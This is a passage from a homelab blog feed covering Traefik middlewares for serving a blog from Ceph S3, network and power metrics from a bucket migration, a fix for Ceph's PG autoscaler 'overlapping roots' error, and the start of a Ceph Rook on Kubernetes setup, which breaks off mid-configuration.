</span></span><span style="display:flex;"><span>    <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">(.*)(?:\/$|(\/[^\.\/]*)$)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">${1}${2}/index.html</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-amz-headers</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">headers</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">customResponseHeaders</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-meta-s3cmd-attrs</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-request-id</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-amz-storage-class</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">x-rgw-object-type</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>The first one, <code>my-blogs-bucket</code>, is a simple rewrite rule, which adds the
bucket&rsquo;s name to the URL right after the root. This turns a URL like
<code>/posts/k8s-migration-5-s3-buckets/</code> into <code>/the-blogs-bucket/posts/k8s-migration-5-s3-buckets/</code>.
But with that, there&rsquo;s still no HTML file. And Traefik, being mainly a proxy,
not a webserver, doesn&rsquo;t have any tricks to automatically add an index file.</p>
<p>This problem is solved by the second Middleware, <code>blog-index</code>. It takes the path
and appends <code>/index.html</code> to it, but only if the path ends in a <code>/</code>. Even that
is not enough, because some browsers seem to actively strip a trailing <code>/</code> from
the URL. That&rsquo;s what the second alternative in the regex handles: it makes sure that
paths which don&rsquo;t point to a file also get <code>/index.html</code> appended, even when they
don&rsquo;t end in a <code>/</code>.</p>
<p>The last middleware, <code>blog-amz-headers</code>, just removes some S3 headers which
Ceph&rsquo;s RGW tacks on by default, and which really don&rsquo;t need to leave my network.</p>
<p>And that&rsquo;s it for the migrations. There were a couple of other utility buckets,
but they really aren&rsquo;t that interesting. Instead, let&rsquo;s go for some pretty
plots. &#x1f913;</p>
<h1 id="metrics">Metrics</h1>
<p>The first thing to note is that my transfer speed from a bucket on the old cluster
to the new cluster with <code>mc cp -a --recursive</code> capped out at around 50MiB/s.
This is way below the line speed of my 1Gbit/s network. My disk IO on the receiving
Ceph hosts was around 80%, with about 55MB/s writes.</p>
<p>At first, I wasn&rsquo;t able to find the bottleneck. My command and control host,
where I was running the <code>mc cp</code> command, only showed about 400Mbit/s worth of transfers
in either direction. But then I recalled the network path, which looks something
like this:
<figure>
    <img loading="lazy" src="s3-network.svg"
         alt="A network diagram. It shows a switch in the middle. The switch is connected via a dotted orange line and a solid blue line to the Router box. Connected to the switch via another orange dotted line is a box called &#39;C&amp;C Host&#39;. Connected via solid blue lines to the switch are also boxes labeled &#39;Ceph Host A&#39; and &#39;Ceph Host B&#39;."/> <figcaption>
            <p>Simplified view of the network.</p>
        </figcaption>
</figure>
</p>
<p>All of the involved hosts - the Ceph hosts from the two Ceph clusters and the
C&amp;C host running <code>mc cp</code> - are connected to the same switch, but in different
VLANs. So to get from the C&amp;C host to the Ceph hosts, the data needs to go
through the router, an OPNsense box in my case. The problem is the connection
from the router to the switch. It needs to carry the same traffic twice.
First, the traffic from the source cluster goes through the LAN NIC to the router,
and then out the same NIC but on a different VLAN to the C&amp;C host. Then the C&amp;C
host sends that data right back to the router&rsquo;s LAN NIC, where it leaves again
through the same NIC on my Homelab VLAN and finally reaches the Rook Ceph host.</p>
<p>Here is an example plot of the network traffic on one of the Ceph hosts involved:
<figure>
    <img loading="lazy" src="traffic-ceph.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is traffic in Mbit/s. For about 15 minutes, rx traffic of about 450Mbit/s can be seen."/> <figcaption>
            <p>Network traffic on one of my Ceph hosts during one of the transfers.</p>
        </figcaption>
</figure>

It looks similar on all the other involved hosts. Save for one: the OPNsense box.
Here is the traffic on the NIC which almost everything in my home hangs off of.
<figure>
    <img loading="lazy" src="traffic-router.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is traffic in Mbit/s. For about 15 minutes, rx and tx traffic of about 940 Mbit/s can be seen."/> <figcaption>
            <p>Network traffic on the LAN interface of my router.</p>
        </figcaption>
</figure>

It shows the likely bottleneck. The LAN interface on my router has about 940Mbit/s
worth of traffic in both directions. Time for some network upgrades, it seems. &#x1f913;</p>
<p>Next, let&rsquo;s look at the power consumption of it all. Due to running more HW than
normal, supporting both my Nomad and k8s clusters in parallel, the power usage
of my Homelab already grew from an average of 150W to about 200W. But these
S3 transfers tacked on another 130W:
<figure>
    <img loading="lazy" src="power.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is power usage in Watts. At the beginning and end of the graph, the consumption is around 190W. In the middle, it suddenly first goes up to about 300W and then, 12 minutes later, reaches the peak of almost 330W before going down to 190W again."/> <figcaption>
            <p>Overall Homelab power consumption during one of the bucket transfers.</p>
        </figcaption>
</figure>
</p>
<p>What I&rsquo;m actually a little bit curious about: How much of that increase comes
from the switch?</p>
<p>Finally, let&rsquo;s have a short look at disk usage. On both Ceph clusters, the S3
buckets reside on HDDs, while their indexes reside on SSDs.
First, the view of one of the source cluster&rsquo;s machines:
<figure>
    <img loading="lazy" src="hdd-src-1.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here is the curve labeled &#39;sdc&#39;. It goes from 6% to around 60% and stays there for around 15 minutes before going back to 6%."/> <figcaption>
            <p>IO utilization of one of the source Ceph hosts in the transfer.</p>
        </figcaption>
</figure>

And here is the same graph for the second host in the source Ceph cluster.
<figure>
    <img loading="lazy" src="hdd-src-2.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here is the curve labeled &#39;sdb&#39;. It goes from 6% to around 50% and stays there for around 15 minutes before going back to 6%."/> <figcaption>
            <p>IO utilization of the other source Ceph hosts in the transfer.</p>
        </figcaption>
</figure>

This shows pretty nicely that reads are distributed by Ceph. Combined, both hosts
together show a read rate of about 55MB/s.</p>
<p>Finally, let&rsquo;s have a look at one of the receiving hosts in the Ceph Rook
cluster. I will only show the metrics of one of them here, because the other one
is a VM, and the IO values don&rsquo;t make too much sense.
<figure>
    <img loading="lazy" src="hdd-dest.png"
         alt="A screenshot of a Grafana visualization. On the x axis is time, and on the y axis is disk IO utilization in percent. The interesting part here are two curves, one labeled &#39;sda&#39; and one labeled &#39;sdb&#39;. Both curves increase together from almost zero. The sdb curve goes up to over 80%, while the sda curve goes up to about 20%. Both curves stay there for around 15 minutes before returning to their initial values."/> <figcaption>
            <p>IO utilization on one of the Ceph Rook destination hosts in the transfer.</p>
        </figcaption>
</figure>
</p>
<p>Here we can see that the raw data is not the only thing which needs to be written
during S3 operations. The higher curve, going up to around 80%, is the host&rsquo;s
HDD, where the actual S3 data is stored. The 20% curve is the SATA SSD in the
host, which holds the index of the S3 buckets. The writes come out to about 55MB/s
on the HDD, as expected. Surprisingly, reads and writes on the SSD are almost
zero, so I&rsquo;m wondering what&rsquo;s producing the IOPS there.</p>
<p>And that concludes the &ldquo;pretty plots&rdquo; section of this post. &#x1f913;</p>
<h1 id="conclusion">Conclusion</h1>
<p>This was supposed to be a mostly mechanical action to do during the work week,
with not much thinking required. Instead it turned into a really frustrating affair,
thanks to the difficult-to-debug Traefik compression issue.
And this was only half the issues I saw. The other half was created by sudden
connection loss during bucket copies. This one was solved by adding an outgoing
firewall rule, but I decided to add that to the
<a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">Cilium Load Balancer post</a>
as an update, as that&rsquo;s going to be easier on future readers.</p>
<p>But still, I&rsquo;m done now. The k8s cluster is officially load-bearing. What could
possibly go wrong, running two very different workload orchestrators, both critical
to the Homelab&rsquo;s function? &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>PG Autoscaling in Ceph Rook</title>
      <link>https://blog.mei-home.net/posts/ceph-rook-crush-rules/</link>
      <pubDate>Sun, 21 Jan 2024 21:16:58 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-rook-crush-rules/</guid>
      <description>The PG autoscaler wasn&amp;#39;t working in my rook cluster and the error messages were unhelpful</description>
      <content:encoded><![CDATA[<p>While working on some internal documentation of my <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">Rook Ceph setup</a>,
I found that my pool&rsquo;s <a href="https://docs.ceph.com/en/latest/rados/operations/placement-groups/">Placement Groups</a>
were still at size 1, even though I had transferred about 350GB of data already.</p>
<p>I have the <a href="https://docs.ceph.com/en/latest/rados/operations/placement-groups/#automated-scaling">PG Autoscaler</a>
enabled by default on all pools, so I won&rsquo;t have to have an eye on the PG counts.
But for some reason, scaling wasn&rsquo;t happening.</p>
<p>Digging into the issue, I finally found the following log lines in the MGR
logs:</p>
<pre tabindex="0"><code>pool rbd-fast won&#39;t scale due to overlapping roots: {-3, -1}
pool rbd-bulk won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool homelab-fs-metadata won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool homelab-fs-bulk won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.control won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.meta won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.log won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.index won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.non-ec won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.otp won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool .rgw.root won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool rgw-bulk.rgw.buckets.data won&#39;t scale due to overlapping roots: {-3, -1, -2}
pool 1 contains an overlapping root -1... skipping scaling
pool 2 contains an overlapping root -3... skipping scaling
pool 3 contains an overlapping root -2... skipping scaling
pool 4 contains an overlapping root -3... skipping scaling
pool 5 contains an overlapping root -2... skipping scaling
pool 6 contains an overlapping root -3... skipping scaling
pool 7 contains an overlapping root -3... skipping scaling
pool 8 contains an overlapping root -3... skipping scaling
pool 9 contains an overlapping root -3... skipping scaling
pool 10 contains an overlapping root -3... skipping scaling
pool 11 contains an overlapping root -3... skipping scaling
pool 12 contains an overlapping root -3... skipping scaling
pool 13 contains an overlapping root -2... skipping scaling
</code></pre><p>These lines told me that almost all of my pools were suffering from overlapping
roots. Which was pretty weird to me - I was pretty sure I had none of those.</p>
<p>My CRUSH map looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush tree
</span></span><span style="display:flex;"><span>ID  CLASS  WEIGHT    TYPE NAME
</span></span><span style="display:flex;"><span>-1         13.64517  root default   
</span></span><span style="display:flex;"><span>-4          9.09679      host nakith
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0  
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1  
</span></span><span style="display:flex;"><span>-7          4.54839      host neper 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3  
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2  
</span></span></code></pre></div><p>Compare that to the errors above - the only root I could see here was <code>-1</code>,
the default root.</p>
<p>After some research, I came across the concept of <em>shadow roots</em>. These can be
displayed by adding the <code>--show-shadow</code> option to the previous command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush tree --show-shadow
</span></span><span style="display:flex;"><span>ID  CLASS  WEIGHT    TYPE NAME          
</span></span><span style="display:flex;"><span>-3    ssd   2.72910  root default~ssd   
</span></span><span style="display:flex;"><span>-6    ssd   1.81940      host nakith~ssd
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1      
</span></span><span style="display:flex;"><span>-9    ssd   0.90970      host neper~ssd 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2      
</span></span><span style="display:flex;"><span>-2    hdd  10.91608  root default~hdd   
</span></span><span style="display:flex;"><span>-5    hdd   7.27739      host nakith~hdd
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0      
</span></span><span style="display:flex;"><span>-8    hdd   3.63869      host neper~hdd 
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3      
</span></span><span style="display:flex;"><span>-1         13.64517  root default       
</span></span><span style="display:flex;"><span>-4          9.09679      host nakith    
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0</span>    hdd   7.27739          osd.0      
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">1</span>    ssd   1.81940          osd.1      
</span></span><span style="display:flex;"><span>-7          4.54839      host neper     
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">3</span>    hdd   3.63869          osd.3      
</span></span><span style="display:flex;"><span> <span style="color:#ae81ff">2</span>    ssd   0.90970          osd.2      
</span></span></code></pre></div><p>Now I saw all of the roots. But I still wasn&rsquo;t getting where the overlapping
roots were coming from. So I took a closer look at one of the mentioned pools,
<code>rbd-fast</code>, which should be restricted to SSDs only. First, the pool info
on it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd pool get rbd-fast crush_rule
</span></span><span style="display:flex;"><span>crush_rule: rbd-fast_host_ssd
</span></span></code></pre></div><p>Then looking closer at that rule:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule dump rbd-fast_host_ssd
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_id&#34;</span>: 2,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_name&#34;</span>: <span style="color:#e6db74">&#34;rbd-fast_host_ssd&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;type&#34;</span>: 1,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;steps&#34;</span>: <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;take&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item&#34;</span>: -3,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item_name&#34;</span>: <span style="color:#e6db74">&#34;default~ssd&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;chooseleaf_firstn&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;num&#34;</span>: 0,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;host&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;emit&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>So, this also looks perfectly fine. I googled and googled and read through the
Ceph docs. But I couldn&rsquo;t really find anything. I found some things which
talked about the <code>.mgr</code> pool, but that was the one pool which didn&rsquo;t appear in
the error messages from the MGR daemon above.</p>
<p>But it still was the problem. Even though the autoscaler complained explicitly
about all the other pools, claiming they had overlapping roots, the only pool
which actually had those overlaps was the <code>.mgr</code> pool - the only one which did
<strong>NOT</strong> produce an error log line!</p>
<p>So what does the crush rule for this pool look like?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd pool get .mgr crush_rule
</span></span><span style="display:flex;"><span>replicated_rule
</span></span></code></pre></div><p>And that <code>replicated_rule</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule dump replicated_rule
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_id&#34;</span>: 0,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;rule_name&#34;</span>: <span style="color:#e6db74">&#34;replicated_rule&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;type&#34;</span>: 1,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;steps&#34;</span>: <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;take&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item&#34;</span>: -1,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;item_name&#34;</span>: <span style="color:#e6db74">&#34;default&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;chooseleaf_firstn&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;num&#34;</span>: 0,
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;host&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;op&#34;</span>: <span style="color:#e6db74">&#34;emit&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>So yes, this rule will actually take OSDs from different roots, namely both
the SSD and HDD roots. Which, you know, Ceph could have been <em>a lot</em> clearer
about.
I finally realized that this is the problem from <a href="https://forum.proxmox.com/threads/ceph-overlapping-roots.104199/">this post</a>
in the Proxmox forums.</p>
<p>So to fix this, the <code>.mgr</code> pool also needs to get a CRUSH rule which assigns
a specific device class. I did it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush rule create-replicated replicated-mgr default host ssd
</span></span><span style="display:flex;"><span>ceph osd pool set .mgr crush_rule replicated-mgr
</span></span></code></pre></div><p>This creates a replicated CRUSH rule with a failure domain of <code>host</code> that only
places objects on SSDs, and then assigns that rule to the <code>.mgr</code> pool.</p>
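<p>To double-check that the autoscaler is now actually happy, the autoscale status
command is the place to look:</p>
<pre tabindex="0"><code>ceph osd pool autoscale-status
</code></pre>
<p>As far as I can tell, this command simply prints an empty result for as long as the
overlapping roots problem exists, which in hindsight would have been another good hint.</p>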
<p>And with that, the autoscaler immediately fired up and increased the PG counts
on my pools. &#x1f612;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 4: Storage with Ceph Rook</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/</link>
      <pubDate>Thu, 11 Jan 2024 00:15:01 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/</guid>
      <description>Setting up a Ceph cluster on Kubernetes with Rook</description>
      <content:encoded><![CDATA[<p>Wherein I talk about the setup of Ceph Rook on my k8s cluster.</p>
<p>This is part five of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="the-current-setup">The current setup</h1>
<p><a href="https://blog.mei-home.net/posts/homelab-2022/storage/">I&rsquo;ve been running Ceph as my storage layer for quite a while now</a>.
In my current Nomad setup, it provides volumes for my jobs as well as S3 for those
apps which support it.
In addition, most of my Raspberry Pis are diskless, netbooting off of Ceph&rsquo;s
RBD block devices as their root.
At first glance, <a href="https://ceph.io/en/">Ceph</a> might look like you&rsquo;d need an Ops
team of at least three people to run it. But after the initial setup, I&rsquo;ve found
it to be very low maintenance. Adding additional disks or entire additional
hosts is very low effort.
I went through the following stages, with the exact same cluster, without any
outages or cluster recreation:</p>
<ol>
<li>Baremetal on my single homelab server - bad idea, as that server also needed
to mount Ceph disks</li>
<li>On a single VM on that same server</li>
<li>Spread over four LXD VMs on that server</li>
<li>Spread over three LXD VMs on that server and a Raspberry Pi CM4 in an IO board
with a SATA card attached</li>
<li>My current config, with three dedicated baremetal machines</li>
</ol>
<p>Before I started my migration, I had a setup with three x86 hosts, each with
one 1TB SATA SSD and one 4TB HDD. Overall, I was using only about 40% of that
storage. I then had several pools configured, each with a replication factor of
&ldquo;2&rdquo;. This works pretty much like a RAID1 setup, where all data is mirrored on
two disks. Or, in my case, on two different hosts even. This allows me to reboot
any of my hosts without any outages, as I&rsquo;ve configured Ceph to be okay with
only one replica when a host is down.</p>
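<p>In plain Ceph terms, that corresponds to a replicated pool size of 2 with a minimum
size of 1. Set by hand, that would look roughly like this for one of the pools
(shown only for illustration - <code>min_size 1</code> means Ceph will keep serving IO with a
single surviving copy):</p>
<pre tabindex="0"><code>ceph osd pool set bulk size 2
ceph osd pool set bulk min_size 1
</code></pre>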
<p>For the migration, I took out my emergency replacement HDD and SSD and put them
into my LXD VM host to create another VM with those two drives. I then also took
one of my baremetal hosts out of my baremetal cluster for later addition to the
Kubernetes cluster.</p>
<p>All of this allowed me to keep my baremetal cluster running without interruption,
continuing to supply my Nomad cluster with storage, while I have a whole separate,
<a href="https://rook.io/docs/rook/latest-release/">Ceph Rook</a> based cluster for the
migration. Once I&rsquo;m done with the migration, I will add the two other baremetal
hosts to the Rook cluster and remove the Ceph VM.</p>
<p>I got pretty lucky that I happen to have enough HW and disks laying
around to be able to afford two clusters. It&rsquo;s what allows me to do this migration
at my own pace, iteratively. I&rsquo;m really enjoying that there&rsquo;s no pressure to
finish the migration and I can go on detours like my recent implementation of
<code>LoadBalancer</code> services with Cilium.</p>
<h1 id="why-rook">Why Rook</h1>
<p>So, considering how happy I am with baremetal Ceph, why switch to Rook? First, there
is of course some portion of just wanting to try something new. Then there&rsquo;s the
idea of having what&rsquo;s called a <em>hyperconverged</em> infrastructure. By running
Ceph on Kubernetes instead of stand-alone, I can also run other workloads on
those hosts, which are idling for a lot of the time in the current setup.
It allows me to use my
resources more efficiently. I&rsquo;m not implementing this right now, having added
a <code>NoSchedule</code> taint to my Ceph hosts. This is mostly because I&rsquo;m still unsure
of the behavior when I have to take the entire cluster down. Most of my services
will need Ceph, but they might get scheduled before the Ceph pods, on the Ceph
hosts.
I understand that I can work with <code>PriorityClass</code> here, but I have not gotten
to wrapping my head around that.</p>
<p>Another really important point: Ceph Rook is very declarative, as you&rsquo;ll see
shortly. Baremetal Ceph with Cephadm, on the other hand, is mostly invoking
commands by hand. There are no good ways to version control my Ceph cluster
setup at the moment. I&rsquo;ve had to keep meticulous notes about the commands I
need to execute.</p>
<p>But Rook is not all milk and honey. Rook can, for example, not use the same
pool for multiple storage types. A pool is either only for RBD, CephFS or RGW usage. No
mixing. So I will have to create multiple pools. In my current setup, I just
have a generic <code>bulk</code> and <code>fast</code> pool, with HDDs and SSDs respectively. Those
are then used for all three storage applications.
Furthermore, Ceph&rsquo;s dashboard does not support Rook as an orchestrator very well
right now. Several pieces of information I can see in my baremetal dashboard
are &ldquo;N/A&rdquo; on the Rook Ceph dashboard.</p>
<p>Here is an example:</p>
<figure>
    <img loading="lazy" src="host-list.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. The selected tab is &#39;Hosts List&#39;. In the table, the colums &#39;Hostname&#39; and &#39;Service Instances&#39; are blurred. The only column with actual content, &#39;Status&#39;, shows &#39;Available&#39; for all lines. There are additional columns, all showing &#39;N/A&#39; for all lines: &#39;Model&#39;, &#39;CPUs&#39;, &#39;Cores&#39;, &#39;Total Memory&#39;, &#39;Raw Capacity&#39;, &#39;HDDs&#39;, &#39;Flash&#39;, &#39;NICs&#39;."/> <figcaption>
            <p>The Host List of the Ceph Dashboard. No information at all is shown about any of the nodes.</p>
        </figcaption>
</figure>

<p>The dashboard data is pretty useless, not showing any HW data about the hosts at all.
It looks similar in the <code>Services</code> overview, which shows completely wrong
service counts. At least the <code>OSD</code> overview is entirely correct. The same is
true for the <code>Pools</code>, <code>Block</code> and <code>File Systems</code> UIs. But the Ceph RGW/S3 UI
is just not supported at all. Even with RGWs deployed and working, the dashboard
shows me that RGW access failed.</p>
<p>The problems with the dashboard are known and are currently being worked on by
the Rook maintainers. It also isn&rsquo;t a pure dashboard problem, but the same problem
occurs for the data visible via <code>ceph orch ps</code>, where the columns <code>Ports</code>, <code>Mem Use</code>
and <code>Mem Lim</code> are empty, and the <code>Version</code> column just shows <code>&lt;unknown&gt;</code>.
Not great to be honest, but I assume this kind of info just didn&rsquo;t seem too
urgent, because it is also available directly via Kubernetes.</p>
<p>Finally, one rather sad point: There&rsquo;s no official migration path between Ceph
baremetal and Ceph Rook. Yes, there are some wild guides floating around, but
I don&rsquo;t trust any of them with my data, as they all invariably contain some
variation of &ldquo;after you&rsquo;ve finished fuzzing around with the cluster ID&hellip;&rdquo;.</p>
<p>So what I&rsquo;ll do instead is manual migrations. I still have to look into Ceph RBD
import/export. I also thought about using Ceph&rsquo;s mirroring features, but the
setup of that between the baremetal and Rook clusters doesn&rsquo;t really look worth
it. So it will likely just come down to mounting both volumes on one host and
using trusty old <code>rsync</code>.</p>
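<p>A rough sketch of what that will probably end up looking like, assuming the old and
the new RBD volume are both mapped and mounted on the same host (the mount paths are
made up):</p>
<pre tabindex="0"><code># old (baremetal) and new (Rook) volume mounted side by side on one host
rsync -aHAX --info=progress2 /mnt/old-volume/ /mnt/new-volume/
</code></pre>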
<h1 id="ceph-rook-setup">Ceph Rook setup</h1>
<p>To set up Rook, I&rsquo;m using the <a href="https://rook.io/docs/rook/latest-release/Helm-Charts/helm-charts/">Helm charts</a>.
There are two of them, one for the Rook operator and one for the cluster. With
this separation, multiple clusters can be controlled by the same operator. I&rsquo;m
not using that capability here, though.</p>
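<p>The installation of the two charts itself is standard Helm fare, roughly like this
(namespace and release names follow the Rook docs here, not necessarily my final
setup):</p>
<pre tabindex="0"><code>helm repo add rook-release https://charts.rook.io/release
helm install --create-namespace --namespace rook-ceph rook-ceph \
    rook-release/rook-ceph -f operator-values.yaml
helm install --namespace rook-ceph rook-ceph-cluster \
    rook-release/rook-ceph-cluster -f cluster-values.yaml
</code></pre>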
<p>The initial node setup isn&rsquo;t too interesting, save for one thing, namely
the taints. As I noted above, while I would like to share the resources of the
Ceph hosts with other deployments, for now I&rsquo;ve added a <code>NoSchedule</code> taint.
I&rsquo;m adding this taint via the <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-JoinConfiguration">kubeadm join config</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">taints</span>:
